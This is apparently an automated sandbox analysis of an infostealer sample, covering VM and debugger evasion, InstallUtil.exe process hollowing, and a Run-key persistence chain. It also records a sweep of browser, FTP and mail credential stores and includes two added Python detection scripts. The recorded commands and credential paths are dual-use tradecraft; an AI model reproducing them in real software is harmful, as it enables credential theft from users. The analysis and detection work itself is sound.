                    Source: watchdog.exe, 00000012.00000002.3433742063.00000000006E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: InstallUtil.exe, 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000010.00000002.3462947858.00000000064B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
                    Source: image.exe, 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 806010189GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: C:\Users\user\Desktop\image.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

Source: C:\Users\user\Desktop\image.exe | Code function: 0_2_05127568 CheckRemoteDebuggerPresent, 0_2_05127568
Source: C:\Users\user\Desktop\image.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\image.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\ACID.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\ACID.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\image.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACID.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\image.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000
Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
Source: C:\Users\user\AppData\Roaming\ACID.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: E56008
Source: C:\Users\user\Desktop\image.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
Source: C:\Users\user\Desktop\image.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" "C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 28
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\ACID.exe "C:\Users\user\AppData\Roaming\ACID.exe"
Source: C:\Users\user\AppData\Roaming\ACID.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\ACID.exe | Process created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Process created: C:\Users\user\AppData\Local\Temp\watchdog.exe "C:\Users\user\AppData\Local\Temp\watchdog.exe"
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Users\user\Desktop\image.exe VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACID.exe | Queries volume information: C:\Users\user\AppData\Roaming\ACID.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACID.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACID.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACID.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACID.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\watchdog.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\watchdog.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\watchdog.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\image.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
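The "Process created" lines above record one chain worth turning into detection logic: a cmd.exe that sleeps with ping 127.0.0.1 -n N, a REG ADD into the HKCU Run key pointing at a copy of the sample in AppData\Roaming, and an argument-less InstallUtil.exe spawned by that copy (the "Memory written ... value starts with: 4D5A" lines show the hollowing that follows). The script below is an added example, not part of the Joe Sandbox report: it builds a process tree from constructed process-creation events that mirror the lines above and flags each of the three behaviours. The ProcEvent fields, regexes, verdict labels and the benign InstallUtil control event are this example's own assumptions.

```python
"""Detect the ping-sleep / Run-key / InstallUtil chain from process-creation events.

Added example, not part of the Joe Sandbox report. The events below are
constructed to mirror the "Process created" lines above; the ProcEvent
fields, pattern names and verdict labels are this example's own assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Constructed sample: image.exe -> cmd.exe -> reg.exe / ACID.exe -> InstallUtil.exe,
# plus one benign control (a developer running InstallUtil with an assembly argument).
SAMPLE_EVENTS = [
    ProcEvent(5024, 1000, r"C:\Users\user\Desktop\image.exe", r'"C:\Users\user\Desktop\image.exe"'),
    ProcEvent(5100, 5024, r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
              r'/f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"'),
    ProcEvent(5101, 5024, r"C:\Windows\SysWOW64\cmd.exe",
              r'"cmd" /c ping 127.0.0.1 -n 28 > nul && copy "C:\Users\user\Desktop\image.exe" '
              r'"C:\Users\user\AppData\Roaming\ACID.exe" && ping 127.0.0.1 -n 28 > nul && "C:\Users\user\AppData\Roaming\ACID.exe"'),
    ProcEvent(5200, 5100, r"C:\Windows\SysWOW64\reg.exe",
              r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "ACID" /t REG_SZ /d "C:\Users\user\AppData\Roaming\ACID.exe"'),
    ProcEvent(6900, 5101, r"C:\Users\user\AppData\Roaming\ACID.exe", r'"C:\Users\user\AppData\Roaming\ACID.exe"'),
    ProcEvent(1112, 6900, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"'),
    ProcEvent(7000, 7001, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
              r"InstallUtil.exe /i C:\src\MyService.exe"),
]

# 'ping 127.0.0.1 -n N > nul' is a sleep: N echoes one second apart, so about N-1 seconds.
PING_SLEEP = re.compile(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)\s*>\s*nul", re.I)
RUN_KEY = re.compile(r'REG\s+ADD\s+"?HK(?:CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', re.I)
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.I)


def ping_sleep_seconds(cmdline):
    """Total delay a command line buys through localhost ping loops."""
    return sum(max(int(n) - 1, 0) for n in PING_SLEEP.findall(cmdline))


def analyse(events):
    """Return (pid, verdict, detail) tuples for the three behaviours in the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        secs = ping_sleep_seconds(e.cmdline)
        if secs:
            findings.append((e.pid, "ping_sleep", f"about {secs}s of delay via ping loops"))
        if RUN_KEY.search(e.cmdline) and USER_WRITABLE.search(e.cmdline):
            findings.append((e.pid, "run_key_persistence", "Run value points into the user's AppData"))
        if e.image.lower().endswith("\\installutil.exe"):
            # Hollowing target: InstallUtil started with no arguments by a binary living in AppData.
            bare = e.cmdline.strip().strip('"').lower().endswith("installutil.exe")
            if bare and parent is not None and USER_WRITABLE.search(parent.image):
                findings.append((e.pid, "installutil_hollowing",
                                 f"argument-less InstallUtil.exe spawned by {parent.image}"))
    return findings


if __name__ == "__main__":
    for pid, verdict, detail in analyse(SAMPLE_EVENTS):
        print(f"pid {pid}: {verdict}: {detail}")
```

The InstallUtil rule deliberately requires both an empty command line and a parent outside Program Files or Windows: InstallUtil.exe with an assembly argument is routine developer activity, whereas an argument-less InstallUtil.exe started from AppData has no legitimate reason to exist and is a common hollowing target for .NET loaders.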

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR
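The "File opened" and "Key opened" lines in this section are the stealer's credential sweep: one process (the hollowed InstallUtil.exe) reads the Chromium login database, several Gecko profile indexes, the WinSCP session key, FTP Navigator's site list, the MAPI profile key and IncrediMail identities within one run. No single product reads all of those, so the useful detection is fan-out per process rather than any one path. The script below is an added example, not part of the Joe Sandbox report: it classifies constructed access events that mirror the lines above into store families and flags a process that touches three or more unrelated families. The family labels, regexes, threshold and the benign chrome.exe control are this example's own assumptions.

```python
"""Score a process by how many unrelated credential stores it reads.

Added example, not part of the Joe Sandbox report. The access events are
constructed to mirror the "File opened" / "Key opened" lines above; the
store labels, patterns and threshold are this example's own assumptions.
"""
import re
from collections import defaultdict

# One pattern per family of credential store. The paths generalise the ones
# seen above to any user profile and any browser profile directory.
CREDENTIAL_STORES = [
    ("chromium_logins", re.compile(r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$", re.I)),
    ("gecko_profiles", re.compile(
        r"\\(?:Mozilla\\Firefox|Thunderbird|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", re.I)),
    ("winscp_sessions", re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions$", re.I)),
    ("ftp_navigator", re.compile(r"\\FTP Navigator\\Ftplist\.txt$", re.I)),
    ("mapi_profiles", re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I)),
    ("incredimail", re.compile(r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$", re.I)),
]

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed sample: (process image, file path or registry key opened).
# InstallUtil.exe mirrors the report; chrome.exe is a benign control that
# only reads its own store.
SAMPLE_ACCESSES = [
    (INSTALLUTIL, r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    (INSTALLUTIL, r"C:\FTP Navigator\Ftplist.txt"),
    (INSTALLUTIL, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (INSTALLUTIL, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"),
]


def classify(target):
    """Map a path or registry key to a store family, or None if it is not one."""
    for label, pattern in CREDENTIAL_STORES:
        if pattern.search(target):
            return label
    return None


def stores_per_process(accesses):
    """Set of distinct store families each process image touched."""
    hits = defaultdict(set)
    for image, target in accesses:
        label = classify(target)
        if label is not None:
            hits[image].add(label)
    return hits


def suspicious(accesses, threshold=3):
    """Processes reading at least `threshold` unrelated families, with the families seen.

    A browser or mail client reads its own store only; a stealer reads every
    store it knows about, so fan-out across families is the signal.
    """
    return {image: sorted(families)
            for image, families in stores_per_process(accesses).items()
            if len(families) >= threshold}


if __name__ == "__main__":
    for image, families in suspicious(SAMPLE_ACCESSES).items():
        print(f"{image}: {', '.join(families)}")
```

The threshold is what keeps this from firing on legitimate software: a process that opens one family (Chrome reading its own Login Data) scores one, whereas the InstallUtil.exe above scores six. The same counting works on Sysmon file-access or registry events once the image and target fields are extracted.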

                    Remote Access Functionality

Source: Yara match | File source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6243d59.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3e03900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.6256fb8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3465569554.0000000004002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003E03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 1112, type: MEMORYSTR
MITRE ATT&CK Matrix (the report's 14-column matrix, listed per tactic column; a number in brackets is the count the matrix displays beside that technique for this sample, entries without a number are matrix cells that carry no count)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Windows Management Instrumentation [231]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading [1]; Valid Accounts [1]; Registry Run Keys / Startup Folder [11]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Privilege Escalation: DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [1]; Process Injection [211]; Registry Run Keys / Startup Folder [11]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
